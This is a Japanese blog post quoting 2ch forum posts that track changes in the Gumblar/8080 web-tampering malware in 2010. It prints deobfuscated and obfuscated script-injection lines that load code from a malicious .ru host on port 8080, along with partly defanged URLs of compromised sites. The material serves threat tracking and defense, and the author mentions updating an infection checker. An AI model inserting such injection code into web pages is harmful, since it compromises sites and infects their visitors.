べつになんでもないこと

[WARNING] 8080 が攻撃手順を変更か？ - UnderForge of Lackで伝えられている通り、改竄コードがまた変わりました。
検索に引っかかりにくい（絞り込みにくい）ので自力じゃ見つけられなかったです。

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】- 2ch.net

19 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/28(木) 21:31:37

直近の要点だけまとめてみた
----------
■Exceptionが「/*･･･*/」無しの「DEBUG」に絶賛進化中。
※最新型は前スレ925氏が「DEBUG」と命名。

■あばすと、かすぺ、農怒は「DEBUG」の検体提出済。
※他の提出状況はしらん(報告待ち中)

難読化を解除すると
<script src=http://skyrock-com.domaintools.com.google-pl.superhighest●ru:8080/xinhuanet.com/xinhuanet.com/att.net/rbc.ru/google.com/></script>

やれやれです。

＜追記＞

71 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/29(金) 11:54:57

>>68
DEBUGじゃない．．．

;document.write('<scr'+'ipt src=h'+'ttp://'+Xiabbjepv1.replace(/Widcfpac5ixzc/g, '8080')+'></scr'+'ipt>');} } catch(Xixc9uyr ) {}
http://apopo●apparelarc-xml●org/z1z00712/

72 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/29(金) 13:09:27

>>71
再改竄
park5●wakwak●com/~izushichi/mikura/index●html
ここは「.ru:Bxj118lelf/」になってる。

.ru:XXXXの部分は
何らかの法則、又はランダムで生成してるような希ガス

昨日のDEBUGは本当にDEBUGだったのか･･･

73 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/29(金) 13:55:42

あーmegaidもDEBUGもランダムになっちまったか…

　　　　　　　　*'``・* 。
　　　　　　　　|　　　　 `*。
　　　　 　　,｡∩　　　　 　*
　　　　　　+　(´･ω･`)　*｡+ﾟ　もうどうにでもな～れ
　　　　　　`*｡ ヽ、　 つ *ﾟ*
　　　　　　　`・+｡*・' ﾟ⊃ +ﾟ
　　　　　　　☆　　 ∪~ ｡*ﾟ

＜／追記＞

えっと、Gumblarとガンブラー （Update）の感染チェック部分を手直ししました。